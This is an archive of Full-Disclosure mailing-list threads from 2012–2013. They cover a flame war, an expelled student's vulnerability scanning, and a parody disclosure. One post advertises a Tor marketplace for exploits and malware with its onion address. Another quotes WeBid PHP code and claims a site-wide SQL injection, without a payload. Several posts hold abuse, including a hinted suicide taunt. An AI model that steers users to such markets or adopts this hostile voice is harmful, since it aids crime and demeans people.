>>> - Original Message -
>>> *From:* Jeffrey Walton 
>>> *To:* Jerry dePriest 
>>> *Cc:* Full Disclosure List 
>>> *Sent:* Friday, March 29, 2013 7:10 AM
>>> *Subject:* Re: [Full-disclosure] Fw: Fw: Justice for Molly (cops
>>> killingcivillians)
>>>
>>> > Go do illegal activities such as reverse engineering
>>> The DMCA (PUBLIC LAW 105–304) has exceptions for reverse engineering and
>>> security testing and evaluation. The RE exemption is in Section 1205
>>> (f) REVERSE ENGINEERING). The ST&E exemption is in Section 1205 (i)
>>> SECURITY TESTING.
>>>
>>> Jeff
>>>
>>> On Fri, Mar 29, 2013 at 8:00 AM, Jerry dePriest  wrote:
>>>
 **
 who made you the boss of FD? Ive seen similiar posts and bullshit like
 April fools jokes posing as 0-day and such. if you dont like it, move
 along. Go do illegal activities such as reverse engineering for 0-day
 exploits or holes in facebook so you can scare the rubes.

 man, try to do something good and I get blasted... Bryan, there is
 a short bridge waiting for you to take a long walk... By the looks of your
 myspace page you're anti social and a troll... We'll you got me. I forogt
 New Zeland is just another offshoot of the penal colony Austrailia used to
 be. You can't help it, it's in your genes...

 Spamming? UCE my mailings were not. They were informative, like this
 list is supposed to be. You liken my postings to the likes of Netdev and
 other assholes who truley UCE'd this list to death.

 btw this is the PERFECT place for this type of discussion. Who made you
 the fucking moderator of fd? You do a horrible job...
 I have been on this list since 2005... My postings are gold compared to
 the viri and other 'spolits people try to con people into.

 1. Let's discuss how his facebook account was hacked along with
 others so no forensics are available. (Feds, gotta love em)
 2. Let's discuss how her facebook account was hacked to say she took a
 bunch of pills THEN shot herself.
 3. Let's discuss what a douchebag you are for downplaying something
 by putting it into the scope of a chain letter? That's confirmation you are
 in fact a true douchebag...

 FOAD

 Antisocial troll... Go remove your myspace page and maybe you wont look
 like such an ass, whole.

>>>
>>>
>>> ___
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>
>>  --
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Fw: Fw: News Delivery Report (Failure)

2013-03-29 Thread Benji 
>> of hacker script punks thinking

>> FOAD

hurhurhur


On Fri, Mar 29, 2013 at 1:10 PM, Jerry dePriest  wrote:

> I'll could spend the whole day pointing out stuff that "isn't pertinent"
> to this list.
>
> at least I have a moral motive, not just a bunch of hacker script punks
> thinking it's cool to have juveniles do their bidding.
>
> FOAD
> __**_
> Full-Disclosure - We believe in it.
> Charter: 
> http://lists.grok.org.uk/full-**disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Fw: (no subject)

2013-03-29 Thread Benji 
LIke the one you just sent?


On Fri, Mar 29, 2013 at 1:07 PM, Jerry dePriest  wrote:

> **
> wow, another important fucking post that has NOTHING to do WHAT SO EVER
> with FD. farging hypocrites...
>
> I could spend HOURS pointing out the bullshit posts, at least mine has
> merit.
>
> FOAD
>
> - Original Message -
> *From:* Gary Baribault 
> *To:* full-disclosure@lists.grok.org.uk
> *Sent:* Thursday, November 15, 2012 8:48 AM
> *Subject:* Re: [Full-disclosure] (no subject)
>
> Now that was mean :-) Funny .. but mean LOL
>
> Gary Baribault
> Courriel: g...@baribault.net
> GPG Key: 0x685430d1
> Signature: 9E4D 1B7C CB9F 9239 11D9 71C3 6C35 C6B7 6854 30D1
>
> On 11/15/2012 08:42 AM, Peter Osterberg wrote:
>
> In most case there are keyboards attached to computers, they provide an
> excellent opportunity for providing content to your mails.
>
> On 2012-11-15 13:02, mohit tyagi wrote:
>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
>  --
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Deutsche Post Security Cup 2013

2013-03-20 Thread Benji 
>>I think its getting ridiculous, if you don't have a name in the industry
you're getting sued for the vast majority of bugs you solve...
>>And on the other hand, those same companies give away 3-15.000 for a
single bug if the researcher happens to be known :|

Examples please


On Wed, Mar 20, 2013 at 1:04 PM, Daniel Preussker wrote:

> On 20.03.2013, at 13:34, Hurgel Bumpf wrote:
>
> > Most of the subscribers are single individuals. Why bother sending them
> a invitaton when 99.9% are rejected because they dont have a "company" or a
> "big team". There a lot of valuable and competent individuals out there
> which are rejected because of their team size in the first place. Don't be
> so closed-minded, most freaks dont have friends and/or a cr3w.
> >
> > Thanks
> >
> > Bonan the bavarian
>
>
> This is a true word.
> I gave up CTF, Cups and similar because nobody cares for the small
> "hacker"...
> They always reject the New-Ones, ones that haven't had 20 0-days on his
> account or a shiny company name and is alone out in the wild.
>
> I think its getting ridiculous, if you don't have a name in the industry
> you're getting sued for the vast majority of bugs you solve...
> And on the other hand, those same companies give away 3-15.000 for a
> single bug if the researcher happens to be known :|
>
> Now I don't intent to start a shitstorm or a war here...
>
> Kind regards from the U-Bahn,
>
> Daniel Preussker
>
> [ Security Consultant, Network & Protocol Security and Cryptography
> [ LPI & Novell Certified Linux Engineer and Researcher
> [ +49 178 600 96 30
> [ dan...@preussker.net
> [ http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x87E736968E490AA1
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] SANS PHP Port Scanner Remote Code Execution

2013-03-06 Thread Benji 
Replace you with they if you want.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] SANS PHP Port Scanner Remote Code Execution

2013-03-06 Thread Benji 
Actually, adding input sanitisation really wouldnt increase the code size
that much. Are you just incompetent?


On Wed, Mar 6, 2013 at 7:46 AM, Źmicier Januszkiewicz  wrote:

> Dear list,
>
> Well, I suppose this had to be a proof-of-concept piece of code to
> demonstrate how port scanning can be done in PHP, not a production-grade
> software. Adding input sanitization would increase the code size by a lot
> and obscure the concept somewhat (not that there is much to be said anout
> the concept though). Think we can give the dude some discount for that.
>
> Nevertheless, seeing something like this coming from "Certified Ethical
> Hacker and Security + certified" makes me doubt the worthness of those
> certificates. Could be nice to know the exact naming of those certificates
> to properly disregard them in the future.
>
> With best regards,
> Z.
>
> 2013/3/6 laurent gaffie 
>
>>
>> http://resources.infosecinstitute.com/php-build-your-own-mini-port-scanner/
>>
>> Finding the vulnerability in this code is left as an exercise to the
>> reader.
>>
>> PS: "*Your comment will be awaiting moderation forever."*
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Student expelled from Montreal college after finding vulnerability that compromised security of 250, 000

2013-01-27 Thread Benji 
Arbitrary moral compass? Amazing.

Please, explain the morals behind finding a bug, reporting it, getting a slap 
on the a wrist, and then running a vuln scanner against the site? If his true 
intent was to see if it was fixed, I would suggest that he checked it with the 
finesse, logic and precision that I would expect from a baby with a hammer.

Morals would tell you to ask, logic would tell you to ask, common sense would 
tell you to ask before the last step, especially after being told off and 
AGREEING to the colleges code of conduct aka morals. If he didn't agree with 
them he shouldn't have agreed to them.

'My banks interest rates seem immoral, I will only pay 6%'. Let me know how 
that logic works out for you.

Pretending that this guy is more than an idiot is astounding.

Do you want your university students to follow the law, or does the law not 
matter if the morals behind it are fine in someone's opinion?

'I robbed the bank and shot the guard, but don't worry it was to keep up on my 
mortgage payments to house my family'

Who uses Acunetix anyway?

As far as I can tell, this argument is now debating opinion which is inherently 
stupid. 

Sent from my lack of morals, and about 3 cans of taurine/caffeine


On 25 Jan 2013, at 22:29, Dan Ballance  wrote:

> My point being, a degree in computer science should reflect the student's 
> ability in computer science - not compliance with some arbirary moral compass 
> dreamt up in a university board somewhere.
> 
> Who gave these university beaurocrats the power to exclude this young person 
> from the education system?  Why is their moral compass deemed to be correct?  
> I thought university lecturers held positions due to their talents in their 
> respective susbjects - not becuase of their ability to implement social 
> policy?
> 
> On 25 Jan 2013 17:40, "Jeffrey Walton"  wrote:
>> On Fri, Jan 25, 2013 at 12:07 PM,   wrote:
>> > On Fri, 25 Jan 2013 09:57:51 +, Dan Ballance said:
>> >
>> >> ...
>> >
>> > Doesn't matter if he ends up a corporate knob or a freedom fighter.  If
>> > he says "I promise to XYZ" you want him to be trustworthy on said promise.
>> >
>> > You might want to ask the guys in Anonymous who got ratted out by one
>> > of their own how they feel about the word "trustworthy" regarding the
>> > rat who said "I promise not to rat you out".
>> :)
>> 
>> There is no honor among thieves (or corporations, or lawyers, or...)
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Student expelled from Montreal college after finding vulnerability that compromised security of 250, 000

2013-01-22 Thread Benji 
Someone please explain to me why he had to run a vulnerability scanner to
check one vulnerability, and again, how are we still arguing about this?
Whether you think he had a 'right' to test this or not, he was either too
dumb or too naive to know it was against the law.

If anyone would like to start arguing whether it's against the (Canadian)
law:

Section 
342.1[4]

Unauthorized use of computer is often used to laid charges for hacker or
someone who is involved in computer related offences. This section states:

Every one who, fraudulently and without colour of
right
,
 (a) obtains, directly or indirectly, any computer service,(b) by means of
an electro-magnetic ,
acoustic , mechanical or other
device, intercepts or causes to be intercepted, directly or indirectly, any
function of a computer system,

I would suggest he broke section (b) and you could argue (a).

On Tue, Jan 22, 2013 at 3:46 AM, Nick FitzGerald
wrote:

> Sanguinarious Rose to me:
>
> > And that is the reason why no one wants to report anything they find,
> > it's because of people like you and your kind of thinking.
>
> As you seem to have assumed a whole bunch about "my kind of thinking"
> that I did not put in the original post, I find the above laughable.
>
> > Did they public post all the private information?
> > No
>
> Agreed.
>
> > Did they try to use it for malious or illicit purposes?
> > No
>
> Not that we know from what seems to be a rather one-sided, self-serving
> to the victim, "the system screwed poor little me" telling of the
> story.
>
> > Did they report it when they found it?
> > Yes
>
> Agreed.
>
> > A horrible moral compass indeed!  ...
>
> No -- I said nothing about what could or should be considered about
> their moral compass _in finding_ the problem.  I did say they probably
> broke _both_ school/other ToS agreements and unauthorized access laws,
> but I did not say what I felt about that.
>
> It is often the case that minor transgressions of such nature are
> necessary in doing many useful things in the computer security domain.
> That alone makes it precarious territory in which to work and such
> issues should obviously be front-of-mind for _anyone_ potentially in
> such territory.
>
> > ...  Arrest these people for being
> > concerned and reporting it after stumbling upon security flaws!
> > Amiright?
>
> No, I did not say that either.
>
> What you seem to have missed (other than that you are reading things
> into my previous post that are not there) was that _after_ these two
> students notified the relevant system owners/operators and/or vendors,
> apparently only _one_ of them went back and did stuff that he probably
> should not have originally done (but that we can _probably_ excuse
> because of a "greater good"), _again_.
>
> _That_ is what tells us something critical about _his_ moral compass
> (either he does not have one, it is rather under-developed for a 20-
> year old or it is rather broken).
>
> Did you notice that this story was not titled "Youths expelled..." "or
> "Students expelled..." _despite_ the first sentence of any substance in
> the National Post article starting:
>
>Ahmed Al-Khabaz ... was working on a mobile app ... when he and a
>colleague discovered what he describes as "sloppy coding" in ...
>
> Did you notice how the rest of story fails to mention that his
> colleague was expelled?
>
> Poor journalism, missing a fairly major fact in the story?
>
> Or perhaps evidence that his "colleague" was not expelled because his
> colleague did not continue to mess with stuff that he should have (now)
> known he should not be messing with?
>
> If _both_ students had been expelled, surely the tone of indignation
> and righteousness would have been greater, so I doubt the fact that the
> article only talks of one student being expelled is due to journalistic
> oversight...
>
> So, Mr Rose, do you now see what you chose to avoid noticing on your
> first pass through this story and its "clever hacker cruelly
> ostracized" skew?
>
>
>
> Regards,
>
> Nick FitzGerald
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Student expelled from Montreal college after finding vulnerability that compromised security of 250, 000 students personal data

2013-01-21 Thread Benji 
He found the vulnerability by running Acunetix against the system. He is
what most be would describe as, a class A moron.


On Mon, Jan 21, 2013 at 8:43 PM, Frank Bures wrote:

> A student has been expelled from Montreal’s Dawson College after he
> discovered a flaw in the computer system used by most Quebec CEGEPs
> (General and Vocational Colleges), one which compromised the security of
> over 250,000 students’ personal information.
>
> Ahmed Al-Khabaz, a 20-year-old computer science student at Dawson and a
> member of the school’s software development club, was working on a mobile
> app to allow students easier access to their college account when he and a
> colleague discovered what he describes as “sloppy coding” in the widely
> used Omnivox software which would allow “anyone with a basic knowledge of
> computers to gain access to the personal information of any student in the
> system, including social insurance number, home address and phone number,
> class schedule, basically all the information the college has on a
> student.”
>
> http://tinyurl.com/bcdrelh
>
> Cheers
> Frank
>
> --
>
> 
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Are software cracks also a form of security vulnerabilities?

2013-01-17 Thread Benji 
On Thu, Jan 17, 2013 at 9:20 AM, COPiOUS  wrote:

> In my opinion they are, since a software crack allows unauthorized use of
> software and the exposure of (possible) trade secrets


How is this possible with a cracked app but not one that isnt cracked?
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] BF, CSRF, and IAA vulnerabilities in websecurity.com.ua

2013-01-01 Thread Benji 
I was asking for your opinion.


On Tue, Jan 1, 2013 at 7:31 PM, some one  wrote:

> If you reread what i posted you will see that i do not give my opinion on
> the quality of his posts. I will keep that to myself, I just state that its
> better than dudes (and your) troll posts.
>
> Regards
> On Jan 1, 2013 3:04 PM, "Benji"  wrote:
>
>> So you would say, that you find the things he posts "of interest"?
>>
>> Please expand on how and why anti automation bugs in unknown cms's are
>> "of interest"?
>>
>>
>> On Mon, Dec 31, 2012 at 11:58 PM, some one wrote:
>>
>>> If you do not like or find of interest what the guy posts is it not
>>> easier to just press delete or filter him out rather than try to make fun
>>> of him?
>>>
>>> Give the dude a break man, hes submitting more things of interest than
>>> you are and you just make yourself sound bitter and twisted.
>>>
>>> Its new year man, go out and drink a beer or eat some fireworks
>>> On Dec 31, 2012 5:17 PM, "Julius Kivimäki" 
>>> wrote:
>>>
>>>> Hello list!
>>>>
>>>> I want to warn you about multiple extremely severe vulnerabilities in
>>>> websecurity.com.ua.
>>>>
>>>> These are Brute Force and Insufficient Anti-automation vulnerabilities
>>>> in websecurity.com.ua. These vulnerability is very serious and could
>>>> affect million of people.
>>>>
>>>> -
>>>> Affected products:
>>>> -
>>>>
>>>> Vulnerable are all versions of websecurity.com.ua.
>>>>
>>>> --
>>>> Details:
>>>> --
>>>>
>>>> Brute Force (WASC-11):
>>>>
>>>> In ftp server (websecurity.com.ua:21) there is no protection from
>>>> Brute Force
>>>> attacks.
>>>>
>>>> Cross-Site Request Forgery (WASC-09):
>>>>
>>>> Lack of captcha in login form (http://websecurity.com.ua:21/) can be
>>>> used for
>>>> different attacks - for CSRF-attack to login into account (remote login
>>>> - to
>>>> conduct attacks on vulnerabilities inside of account), for automated
>>>> entering into account, for phishing and other automated attacks. Which
>>>> you
>>>> can read about in the article "Attacks on unprotected login forms"
>>>> (
>>>> http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2011-April/007773.html
>>>> ).
>>>>
>>>> Insufficient Anti-automation (WASC-21):
>>>>
>>>> In login form there is no protection against automated request, which
>>>> allow
>>>> to picking up logins in automated way by attacking on login function.
>>>> 
>>>> Timeline:
>>>> 
>>>>
>>>> 2012.06.28 - announced at my site about websecurity.com.ua.
>>>> 2012.06.28 - informed developers about the first part of
>>>> vulnerabilities in
>>>> websecurity.com.ua.
>>>> 2012.06.30 - informed developers about the second part of
>>>> vulnerabilities in
>>>> websecurity.com.ua.
>>>> 2012.07.26 - announced at my site about websecurity.com.ua.
>>>> 2012.07.28 - informed developers about vulnerabilities in
>>>> websecurity.com.ua
>>>> and reminded about previous two letters I had sent to them with carrier
>>>> pigeons.
>>>> 2012.07.28-2012.10.31 - multiple attempts to contact the owners of
>>>> websecurity.com.ua
>>>> were ignored by the owners.
>>>> 2012.11.02 - developers responded "fuck off and kill urself irl!".
>>>> 2012.12.31 - disclosed on the list
>>>>
>>>> Best wishes & regards,
>>>> MustLive
>>>> Security master extraordinaire, master sysadmin
>>>> http://websecurity.com.ua
>>>>
>>>> ___
>>>> Full-Disclosure - We believe in it.
>>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>>
>>>
>>> ___
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>
>>
>>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] BF, CSRF, and IAA vulnerabilities in websecurity.com.ua

2013-01-01 Thread Benji 
So you would say, that you find the things he posts "of interest"?

Please expand on how and why anti automation bugs in unknown cms's are "of
interest"?


On Mon, Dec 31, 2012 at 11:58 PM, some one wrote:

> If you do not like or find of interest what the guy posts is it not easier
> to just press delete or filter him out rather than try to make fun of him?
>
> Give the dude a break man, hes submitting more things of interest than you
> are and you just make yourself sound bitter and twisted.
>
> Its new year man, go out and drink a beer or eat some fireworks
> On Dec 31, 2012 5:17 PM, "Julius Kivimäki" 
> wrote:
>
>> Hello list!
>>
>> I want to warn you about multiple extremely severe vulnerabilities in
>> websecurity.com.ua.
>>
>> These are Brute Force and Insufficient Anti-automation vulnerabilities
>> in websecurity.com.ua. These vulnerability is very serious and could
>> affect million of people.
>>
>> -
>> Affected products:
>> -
>>
>> Vulnerable are all versions of websecurity.com.ua.
>>
>> --
>> Details:
>> --
>>
>> Brute Force (WASC-11):
>>
>> In ftp server (websecurity.com.ua:21) there is no protection from Brute
>> Force
>> attacks.
>>
>> Cross-Site Request Forgery (WASC-09):
>>
>> Lack of captcha in login form (http://websecurity.com.ua:21/) can be
>> used for
>> different attacks - for CSRF-attack to login into account (remote login -
>> to
>> conduct attacks on vulnerabilities inside of account), for automated
>> entering into account, for phishing and other automated attacks. Which you
>> can read about in the article "Attacks on unprotected login forms"
>> (
>> http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2011-April/007773.html
>> ).
>>
>> Insufficient Anti-automation (WASC-21):
>>
>> In login form there is no protection against automated request, which
>> allow
>> to picking up logins in automated way by attacking on login function.
>> 
>> Timeline:
>> 
>>
>> 2012.06.28 - announced at my site about websecurity.com.ua.
>> 2012.06.28 - informed developers about the first part of vulnerabilities
>> in
>> websecurity.com.ua.
>> 2012.06.30 - informed developers about the second part of vulnerabilities
>> in
>> websecurity.com.ua.
>> 2012.07.26 - announced at my site about websecurity.com.ua.
>> 2012.07.28 - informed developers about vulnerabilities in
>> websecurity.com.ua
>> and reminded about previous two letters I had sent to them with carrier
>> pigeons.
>> 2012.07.28-2012.10.31 - multiple attempts to contact the owners of
>> websecurity.com.ua
>> were ignored by the owners.
>> 2012.11.02 - developers responded "fuck off and kill urself irl!".
>> 2012.12.31 - disclosed on the list
>>
>> Best wishes & regards,
>> MustLive
>> Security master extraordinaire, master sysadmin
>> http://websecurity.com.ua
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Selling Exploit on Deep Web

2012-12-21 Thread Benji 
Not your website. The website you were somehow accusing of being shit based
on it's lack of interesting information when obviously hacktalk is a
plethora of information, expertise and semen samples.


On Fri, Dec 21, 2012 at 2:44 PM, Luis Santana  wrote:

> Lulz? Sorry bro but uh, the main page runs SMF not WeBid so I'm not really
> too sure where you pulled that from. Good job though, maybe santa will give
> you some of his cookies for your effort.
>
>
> On Dec 21, 2012, at 5:26 AM, Benji  wrote:
>
> Also genius, I know you're quick to kick things down because you are
> inept. However, I'd say after my whole 10 minute review of that code and a
> simple check with PHP that, that site is vulnerable to SQLi and by the look
> of it.
>
> If we take a look at latest WeBid code, specifically selleremails.php, we
> see them doing an array_merge from $_POST to $user>user_data (user_data
> being a trusted array it would appear).
>
> include 'includes/common.inc.php';
>
> if (!$user->is_logged_in())
> {
> $_SESSION['REDIRECT_AFTER_LOGIN'] = 'selleremails.php';
>  header('location: user_login.php');
> exit;
> }
>
> // Create new list
>  if (isset($_POST['action']) && $_POST['action'] == 'update')
> {
> $query = "UPDATE " . $DBPrefix . "users SET endemailmode = '" .
> $system->cleanvars($_POST['endemailmod']) . "',
>   startemailmode = '" . $system->cleanvars($_POST['startemailmod']) . "',
>   emailtype = '" . $system->cleanvars($_POST['emailtype']) . "'  WHERE id
> = " . $user->user_data['id'];
>  $system->check_mysql(mysql_query($query), $query, __LINE__, __FILE__);
> $ERR = $MSG['25_0192'];
>  $user->user_data = array_merge($user->user_data, $_POST); //update the
> array
> }
>
> After staying up all night and working through this code, I came up with
> this test case:
>  $array1 = array("color" => "red");
> $array2 = array("color" => "test");
> $result = array_merge($array1, $array2);
> print_r($result);
> ?>
> Array
> (
> [color] => test
> )
>
> So as we can overwrite any array value, we have SQLi across the
> application. Maybe a first 0day for hacktalk.net?
>
> I will take your 'hella l33t', print it out, and then shit on it.
>
> Suck my dick.
>
>
> On Fri, Dec 21, 2012 at 10:12 AM, Benji  wrote:
>
>> You say "n00bz" welcome, where is my assistance and the warm atmosphere
>> to embrace me into the world of script kiddy-ism? Oh, and the obvious
>> literary genius.
>>
>>
>> On Fri, Dec 21, 2012 at 8:25 AM, Luis Santana wrote:
>>
>>> Hella l33t bro, you can read an email address. Much propz
>>>
>>>
>>> On Dec 21, 2012, at 3:22 AM, Benji  wrote:
>>>
>>> in other news, have you heard of the super cool site hacktalk.net where
>>> they almost have 1000 members?
>>>
>>>
>>> On Thu, Dec 20, 2012 at 3:13 PM, Luis Santana wrote:
>>>
>>>> Not a single fucking exploit on the entire site. gg sir, gg
>>>>
>>>>
>>>> On Dec 10, 2012, at 2:17 PM, tig3rh...@tormail.org wrote:
>>>>
>>>> > In Deep Web has created a new online site a few days ago that allows
>>>> you
>>>> > to sell even exploits, malware, etc. etc..
>>>> > The site works like Ebay so everything is auctioned.
>>>> >
>>>> > you can get from tor: http://qatuopo4wmzkirlo.onion
>>>> >
>>>> > Or by proxy (tor2web): https://qatuopo4wmzkirlo.tor2web.org
>>>> >
>>>> > ___
>>>> > Full-Disclosure - We believe in it.
>>>> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>>> > Hosted and sponsored by Secunia - http://secunia.com/
>>>>
>>>> ___
>>>> Full-Disclosure - We believe in it.
>>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>>
>>>
>>>
>>>
>>
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Selling Exploit on Deep Web

2012-12-21 Thread Benji 
You say "n00bz" welcome, where is my assistance and the warm atmosphere to
embrace me into the world of script kiddy-ism? Oh, and the obvious literary
genius.


On Fri, Dec 21, 2012 at 8:25 AM, Luis Santana  wrote:

> Hella l33t bro, you can read an email address. Much propz
>
>
> On Dec 21, 2012, at 3:22 AM, Benji  wrote:
>
> in other news, have you heard of the super cool site hacktalk.net where
> they almost have 1000 members?
>
>
> On Thu, Dec 20, 2012 at 3:13 PM, Luis Santana wrote:
>
>> Not a single fucking exploit on the entire site. gg sir, gg
>>
>>
>> On Dec 10, 2012, at 2:17 PM, tig3rh...@tormail.org wrote:
>>
>> > In Deep Web has created a new online site a few days ago that allows you
>> > to sell even exploits, malware, etc. etc..
>> > The site works like Ebay so everything is auctioned.
>> >
>> > you can get from tor: http://qatuopo4wmzkirlo.onion
>> >
>> > Or by proxy (tor2web): https://qatuopo4wmzkirlo.tor2web.org
>> >
>> > ___
>> > Full-Disclosure - We believe in it.
>> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> > Hosted and sponsored by Secunia - http://secunia.com/
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Selling Exploit on Deep Web

2012-12-21 Thread Benji 
Also genius, I know you're quick to kick things down because you are inept.
However, I'd say after my whole 10 minute review of that code and a simple
check with PHP that, that site is vulnerable to SQLi and by the look of it.

If we take a look at latest WeBid code, specifically selleremails.php, we
see them doing an array_merge from $_POST to $user>user_data (user_data
being a trusted array it would appear).

include 'includes/common.inc.php';

if (!$user->is_logged_in())
{
$_SESSION['REDIRECT_AFTER_LOGIN'] = 'selleremails.php';
 header('location: user_login.php');
exit;
}

// Create new list
if (isset($_POST['action']) && $_POST['action'] == 'update')
{
$query = "UPDATE " . $DBPrefix . "users SET endemailmode = '" .
$system->cleanvars($_POST['endemailmod']) . "',
  startemailmode = '" . $system->cleanvars($_POST['startemailmod']) . "',
  emailtype = '" . $system->cleanvars($_POST['emailtype']) . "'  WHERE id =
" . $user->user_data['id'];
 $system->check_mysql(mysql_query($query), $query, __LINE__, __FILE__);
$ERR = $MSG['25_0192'];
 $user->user_data = array_merge($user->user_data, $_POST); //update the
array
}

After staying up all night and working through this code, I came up with
this test case:
 "red");
$array2 = array("color" => "test");
$result = array_merge($array1, $array2);
print_r($result);
?>
Array
(
[color] => test
)

So as we can overwrite any array value, we have SQLi across the
application. Maybe a first 0day for hacktalk.net?

I will take your 'hella l33t', print it out, and then shit on it.

Suck my dick.


On Fri, Dec 21, 2012 at 10:12 AM, Benji  wrote:

> You say "n00bz" welcome, where is my assistance and the warm atmosphere to
> embrace me into the world of script kiddy-ism? Oh, and the obvious literary
> genius.
>
>
> On Fri, Dec 21, 2012 at 8:25 AM, Luis Santana wrote:
>
>> Hella l33t bro, you can read an email address. Much propz
>>
>>
>> On Dec 21, 2012, at 3:22 AM, Benji  wrote:
>>
>> in other news, have you heard of the super cool site hacktalk.net where
>> they almost have 1000 members?
>>
>>
>> On Thu, Dec 20, 2012 at 3:13 PM, Luis Santana wrote:
>>
>>> Not a single fucking exploit on the entire site. gg sir, gg
>>>
>>>
>>> On Dec 10, 2012, at 2:17 PM, tig3rh...@tormail.org wrote:
>>>
>>> > In Deep Web has created a new online site a few days ago that allows
>>> you
>>> > to sell even exploits, malware, etc. etc..
>>> > The site works like Ebay so everything is auctioned.
>>> >
>>> > you can get from tor: http://qatuopo4wmzkirlo.onion
>>> >
>>> > Or by proxy (tor2web): https://qatuopo4wmzkirlo.tor2web.org
>>> >
>>> > ___
>>> > Full-Disclosure - We believe in it.
>>> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> > Hosted and sponsored by Secunia - http://secunia.com/
>>>
>>> ___
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>
>>
>>
>>
>
___
